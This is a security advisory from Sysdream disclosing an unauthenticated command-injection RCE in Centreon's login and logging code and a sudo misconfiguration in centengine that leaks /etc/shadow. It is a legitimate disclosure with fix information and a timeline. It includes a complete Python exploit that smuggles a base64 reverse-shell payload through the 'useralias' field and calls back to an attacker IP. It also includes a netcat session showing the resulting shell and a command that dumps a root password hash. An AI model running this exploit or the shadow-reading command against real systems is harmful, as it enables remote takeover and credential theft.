Centreon is a popular monitoring solution.
A critical vulnerability has been found in the Centreon logging class allowing remote users to execute arbitrary commands.

SQL injection leading to RCE

Centreon logs SQL database errors in a log file using the "echo" system command and the exec() PHP function. On the authentification class, Centreon use htmlentities with the ENT_QUOTES options to filter SQL entities. However, Centreon doesn't filter the SQL escape character "\" and it is possible to generate an SQL Error. Because of the use of the "echo" system command with the PHP exec() function, and because of the lack of sanitization, it is possible to inject arbitrary system commands.

Access Vector: remote

Security Risk: high

Vulnerability: CWE-78

Proof of Concept

TCP Reverse Shell using python.

#!/usr/bin/env python
import requests
import argparse

def shell(target, reverseip, reverseport):
    payload = 'import socket as a,subprocess as b,os as c;s=a.socket(2,1);s.connect(("%s",%d));d=s.fileno();c.dup2(d,0);c.dup2(d,1);c.dup2(d,2);p=b.call(["sh"]);' % (reverseip,reverseport)
    print "[~] Starting reverseshell : %s - port : %d" % (reverseip, reverseport)
    req = requests.post(target, data={"useralias": "$(echo %s | base64 -d | python)\\" % payload.encode("base64").replace("\n",""), "password": "foo"})
    print "[+] DEAD !"

if __name__ == "__main__":
    print "[~] Centreon Unauthentificated RCE - Nicolas Chatelain <[email protected]>"
    parser = argparse.ArgumentParser()
    parser.add_argument("--target", required=True)
    parser.add_argument("--reverseip", required=True)
    parser.add_argument("--reverseport", required=True, type=int)
    args = parser.parse_args()
    shell(args.target, args.reverseip, args.reverseport)

Shell :

[email protected] ~/Lab/Centreon $ python reverseshell.py --target=http://172.16.138.137/centreon/index.php --reverseip=172.16.138.1 --reverseport 8888
[~] Centreon Unauthentificated RCE - Nicolas Chatelain <[email protected]>
[~] Starting reverseshell : 172.16.138.1 - port : 8888

Other term

[email protected] ~/Lab/Centreon $ nc -lvp 8888 Ncat: Version 6.45 ( http://nmap.org/ncat ) Ncat: Listening on :::8888 Ncat: Listening on 0.0.0.0:8888 Ncat: Connection from 172.16.138.135. Ncat: Connection from 172.16.138.135:50050. whoami apache groups apache centreon-engine centreon-broker centreon nagios

Vulnerable code

The vulnerable code is located in class/centreonLog.class.php, line 82 and line 154:

    /*
     * print Error in log file.
     */
    exec("echo \"".$string."\" >> ".$this->errorType[$id]);

In class/centreonAuth.class.php, line 227:

 $DBRESULT = $this->pearDB->query("SELECT * FROM `contact` WHERE `contact_alias` = '" . htmlentities($username, ENT_QUOTES, "UTF-8") . "' AND `contact_activate` = '1' AND       `contact_register` = '1' LIMIT 1");

Solution

Update to the Centreon 2.5.4

Possible root password disclosure in centengine (Centreon Entreprise Server)

In some configurations, when centengine can run as root (with sudo). It's possible to read some file content.

Access Vector: local

Security Risk: high

Vulnerability: CWE-209

Proof of Concept

$ sudo /usr/sbin/centengine -v /etc/shadow
[1416391088] reading main config file
[1416391088] error while processing a config file: [/etc/shadow:1] bad variable name: 'root:$6$3mvvEHQM3p3afuh4$DZ377daOy.8bn42t7ur82/Geplvsj90J7cs1xsgAbRZ0JDZ8KdB5CcQ0ucF5dwKpnBYLon1XBqjJPqpm6Zr5R0:16392:0:99999:7:::'
[1416391088] 

Vulnerable code

In Centreon Entreprise Server (CES) : /etc/sudoers.d/centreon

CENTREON ALL = NOPASSWD: /usr/sbin/centengine -v *

Solution

Do not allow centengine to be run as root or do not disclose the line that caused the error.

Timeline (dd/mm/yyyy)

  • 18/11/2014 : Initial discovery
  • 26/11/2014 : Contact with Centreon team
  • 27/11/2014 : Centreon correct vulnerabilities
  • 27/11/2014 : Centreon release version 2.5.4 that fixes vulnerabilities

Fixes

Affected versions

  • Centreon <= 2.5.3

Credits

  • Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)